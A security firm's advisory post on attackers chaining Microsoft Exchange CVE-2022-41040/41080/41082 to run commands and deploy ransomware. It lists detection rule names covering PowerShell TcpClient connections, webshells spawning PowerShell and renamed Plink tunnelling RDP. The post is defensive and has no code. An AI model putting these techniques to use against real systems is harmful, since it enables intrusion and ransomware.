Announcement: Cythera has joined forces with Bastion Security Group. Learn more
22 Dec / 2022
Cyber Security
Microsoft Exchange Server (On-Premises) 2013, 2016, 2019 devices that have not applied update KB5019758 released on November 8.
There has been an increase of attacks against On-Prem Exchange Servers that are utilising Microsofts URL Rewrite mitigiations as a defence against CVE-2022-41080 and CVE-2022-41082.
Threat actors are chaining vulnerabilities CVE-2022-41080 and CVE-2022-41082 to infiltrate networks and deploy ransomware.
Attackers are using SSRF vulnerability CVE-2022-41040 to target the backend PowerShell service through Outlook Web Access.
Once the PowerShell service has been reached, vulnerability CVE-2022-41082 is exploited to execute arbitrary commands on the device.
System Administrators are advised to:
Attacker Technique - PowerShell Registry Cradle
Suspicious Process - PowerShell System.Net.Sockets.TcpClient
Suspicious Process - Exchange Server Spawns Process
PowerShell - Obfuscated Script
Webshell - IIS Spawns PowerShell
Attacker Technique - Plink Redirecting RDP
Attacker Technique - Renamed Plink
Suspicious Process - Started From Users Music Directory
Further information on the vulnerability is available Microsoft, Rapid7, CrowdStrike
Cythera Vulnerability Management Clients are actively being scanned for any vulnerable instances of Microsoft Exchange.
Cythera’s Board Advisory Service: Briefing your board on cybersecurity obligations in under 2 hours
In the face of rising cyber threats, the role of board members in safeguarding an organisation's digital assets and information has never been m…
Read MorePaperCut Vulnerability - CVE-2023-27350, CVE-2023-27351
PaperCut MF & PaperCut NG VulnerabilitiesCVE: CVE-2023-27350, CVE-2023-27351 WHAT IS VULNERABLE? PaperCut MF or NG version 8.0 or later, on a…
Read MoreWindows enterprise environments vulnerable to KrbRelayUp attacks.
WHAT’S HAPPENING?In April 2022, a privilege escalation hacking tool known as KrbRelayUp was publicly disclosed on GitHub by security researche…
Read More